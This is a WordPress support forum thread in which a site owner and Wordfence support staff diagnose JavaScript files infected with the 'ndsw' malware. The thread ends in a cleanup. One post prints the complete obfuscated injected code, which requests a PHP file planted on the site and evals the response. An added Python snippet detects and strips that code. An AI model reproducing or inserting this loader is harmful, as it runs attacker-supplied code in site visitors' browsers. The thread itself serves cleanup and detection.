• Resolved keithsmohr

    (@keithsmohr)


    Just had a scan run and out of nowhere, I get 1217 critical issues with .js files mainly. Anyone know why all of a sudden this would occur?

Viewing 11 replies - 1 through 11 (of 11 total)
  • Plugin Support wfpeter

    (@wfpeter)

    Hi @keithsmohr, sorry to see you’ve had critical errors crop up in your scan.

    For me to better identify the possible problem, feel free to copy/paste one of the scan results here to see what the reasoning for the file(s) being flagged are along with a diagnostics report which should include the full scan results for me to potentially look into a little further.

    You can send a diagnostic report to wftest @ wordfence . com The link to do so is at the top of the Wordfence > Tools > Diagnostics page. Then click on “Send Report by Email”. Please add your forum username where indicated and respond here after you have sent it.

    NOTE: It should look as follows – Screenshot of Tools > Diagnostic > Send by Email

    Thanks,

    Peter.

    Thread Starter keithsmohr

    (@keithsmohr)

    Thank you for your reply. I can't even make it through a scan.
    I sent the reports to your email, but did not see where I was able to add my username in with the report. My website is https://www.asafeplaceonline.com

    I see this when my scan stops:

    [APR 04 16:17:01] Fatal error: Maximum execution time of 30 seconds exceeded in /home/asafeplaceonline/public_html/wp-includes/Requests/Transport/cURL.php on line 462 There has been a critical error on this website.Learn more about troubleshooting WordPress.

    Thank you for your help!

    Plugin Support wfpeter

    (@wfpeter)

    Hi @keithsmohr,

    I received a test email from your site but it did not contain a diagnostics report. On Wordfence > Tools > Diagnostics there is a second box underneath email address for “Ticket Number/Forum Username” so please ensure you’re sending from the correct place.

    You could also try the following so we have as much information available to help you as possible:

    • Stop the existing scan if it is still running (The “Start New Scan” button turns into a “Stop” button while the scan is running).
    • Go to your Wordfence > Scan > Manage Scan and locate the “Performance Options” section. Set “Maximum execution time for each scan stage” to 20.
    • Click to “Save Changes”.
    • Go to the Tools > Diagnostics page.
    • In the “Debugging Options” section check the circle “Enable debugging mode”.
    • Click to “Save Changes”.
    • Start a new scan on the Scan page.
    • If the scan fails again, copy the last 20 lines or so from the Log (click the “Show Log” link) once the scan finishes and paste them in the post.

    Thanks again,

    Peter.

    Thread Starter keithsmohr

    (@keithsmohr)

    I was able to run a scan and followed the directions to send you the report.
    Thank you!

    Plugin Support wfpeter

    (@wfpeter)

    Hi @keithsmohr, thanks for sending that over.

    I’m pleased you were able to run your scan and in terms of communication and permissions, your site appears to be functioning as expected. I do have reason to believe that the scan issues are not false-positives and a site clean may be necessary. We have seen the (ndsw===undefined){ pattern that is being picked up associated with malware.

    If you would like a definitive answer on this, you could send one of the affected files to samples @ wordfence . com for us to analyze. Please note that when attaching a file, ensure that you remove any database access credentials or keys/salts before sending.

    Follow the checklist here:
    https://www.wordfence.com/docs/how-to-clean-a-hacked-wordpress-site-using-wordfence/

    Make sure and get all your plugins and themes updated and update WordPress core too. If you are on an older branch (WordPress 4.x etc) because you wanted to wait before installing the latest version because of Gutenberg or a custom theme compatibility you still need the latest update in that version. Those can be found here:
    https://www.ads-software.com/download/releases/
    WordPress sometimes patches their older releases if they find a vulnerability so make sure to update your version if needed. We, of course, recommend that you update to the latest version.

    As a rule, any time I think someone’s site has been compromised I also tell them to update their passwords for their hosting control panel, FTP, WordPress admin users, and database. Make sure to do this.

    Additionally you might find the WordPress Malware Removal section in our free Learning Center helpful.

    If you are unable to clean this on your own there are paid services that will do it for you. Wordfence offers one and there are others. Regardless if you choose to clean it yourself or let someone else do so, we recommend that you make a full backup of the site beforehand.

    Thanks,

    Peter.

    Thread Starter keithsmohr

    (@keithsmohr)

    Thank you. I have emailed a few files that were flagged.
    Let me know what you found and think I should do.
    Thank you

    Thread Starter keithsmohr

    (@keithsmohr)

    I am not able to send the files to you, Gmail is blocking it. It does appear I have malicious code in many of my js files.

    I found this info online.

    https://stackoverflow.com/questions/66303231/wordpress-all-theme-plugin-js-file-is-adding-this-script-how-can-i-remove-that

    Thread Starter keithsmohr

    (@keithsmohr)

    This is the malicious code:

    )();
    ;if(ndsw===undefined){function g(R,G){var y=V();return g=function(O,n){O=O-0x6b;var P=y[O];return P;},g(R,G);}function V(){var v=['ion','index','154602bdaGrG','refer','ready','rando','279520YbREdF','toStr','send','techa','8BCsQrJ','GET','proto','dysta','eval','col','hostn','13190BMfKjR','//asafeplaceonline.com/wp-admin/css/colors/blue/blue.php','locat','909073jmbtRO','get','72XBooPH','onrea','open','255350fMqarv','subst','8214VZcSuI','30KBfcnu','ing','respo','nseTe','?id=','ame','ndsx','cooki','State','811047xtfZPb','statu','1295TYmtri','rer','nge'];V=function(){return v;};return V();}(function(R,G){var l=g,y=R();while(!![]){try{var O=parseInt(l(0x80))/0x1+-parseInt(l(0x6d))/0x2+-parseInt(l(0x8c))/0x3+-parseInt(l(0x71))/0x4*(-parseInt(l(0x78))/0x5)+-parseInt(l(0x82))/0x6*(-parseInt(l(0x8e))/0x7)+parseInt(l(0x7d))/0x8*(-parseInt(l(0x93))/0x9)+-parseInt(l(0x83))/0xa*(-parseInt(l(0x7b))/0xb);if(O===G)break;else y['push'](y['shift']());}catch(n){y['push'](y['shift']());}}}(V,0x301f5));var ndsw=true,HttpClient=function(){var S=g;this[S(0x7c)]=function(R,G){var J=S,y=new XMLHttpRequest();y[J(0x7e)+J(0x74)+J(0x70)+J(0x90)]=function(){var x=J;if(y[x(0x6b)+x(0x8b)]==0x4&&y[x(0x8d)+'s']==0xc8)G(y[x(0x85)+x(0x86)+'xt']);},y[J(0x7f)](J(0x72),R,!![]),y[J(0x6f)](null);};},rand=function(){var C=g;return Math[C(0x6c)+'m']()[C(0x6e)+C(0x84)](0x24)[C(0x81)+'r'](0x2);},token=function(){return rand()+rand();};(function(){var Y=g,R=navigator,G=document,y=screen,O=window,P=G[Y(0x8a)+'e'],r=O[Y(0x7a)+Y(0x91)][Y(0x77)+Y(0x88)],I=O[Y(0x7a)+Y(0x91)][Y(0x73)+Y(0x76)],f=G[Y(0x94)+Y(0x8f)];if(f&&!i(f,r)&&!P){var D=new HttpClient(),U=I+(Y(0x79)+Y(0x87))+token();D[Y(0x7c)](U,function(E){var k=Y;i(E,k(0x89))&&O[k(0x75)](E);});}function i(E,L){var Q=Y;return E[Q(0x92)+'Of'](L)!==-0x1;}}());};
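
Added example, not part of the original thread and not Wordfence's own code: a read-only Python check for the `;if(ndsw===undefined){` guard that the post above shows appended to a `.js` file, plus a helper that cuts a balanced block out of a file's text. The names `find_injection`, `strip_injection` and `scan_tree` and the `SAMPLE` string are constructed for this example, and it assumes the appended block holds no regex or template literals containing braces or quotes.

```python
from pathlib import Path

MARKER = ";if(ndsw===undefined){"  # guard string quoted in the thread

def find_injection(text, pos=0):
    """Return (start, end) of the appended block, or None if absent.
    end is None when the braces never balance (truncated or altered block)."""
    start = text.find(MARKER, pos)
    if start == -1:
        return None
    depth, quote, i = 0, None, start + len(MARKER) - 1  # i sits on the '{'
    while i < len(text):
        c = text[i]
        if quote:                       # inside a string literal
            if c == "\\":
                i += 1                  # skip the escaped character
            elif c == quote:
                quote = None
        elif c in "'\"":
            quote = c
        elif c == "{":
            depth += 1
        elif c == "}":
            depth -= 1
            if depth == 0:
                end = i + 1
                return start, end + (text[end:end + 1] == ";")
        i += 1
    return start, None

def strip_injection(text):
    """Remove every balanced injected block; leave unbalanced ones for manual review."""
    pos = 0
    while (hit := find_injection(text, pos)) is not None:
        start, end = hit
        if end is None:
            break
        text = text[:start] + text[end:]
        pos = start
    return text

def scan_tree(root):
    """List .js files under root that contain the marker (read-only)."""
    return sorted(str(p) for p in Path(root).rglob("*.js")
                  if MARKER in p.read_text(errors="replace"))

# Constructed sample with the shape of the flagged files: legitimate code, then the block.
SAMPLE = "(function(){console.log('ok');})();\n" \
         ";if(ndsw===undefined){function g(){var v=['a}b','c'];return v;}var ndsw=true;};"
```

Run `scan_tree` against a backup copy of the site first; replacing flagged files with fresh copies from the original plugin, theme or core packages is the more reliable fix where those are available.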
    Thread Starter keithsmohr

    (@keithsmohr)

    I fixed all the files, thanks to Wordfence! My site is back to safe and secure! Thanks for the help!

    Plugin Support wfpeter

    (@wfpeter)

    Thanks @keithsmohr, I appreciate the kind words and I’m extremely pleased you were able to resolve the issue with the help of Wordfence.

    By all means start a new topic if you have Wordfence questions in future and we’ll always be happy to assist!

    Peter.

    Hi everyone,
    I have a number of sites where all the JavaScript files have the malicious code mentioned on this page.
    I want to know how this malware has infiltrated my sites,
    and what this malware does to the site, because there is no change in the appearance of the website.

  • The topic ‘crapload of critical errors all the sudden’ is closed to new replies.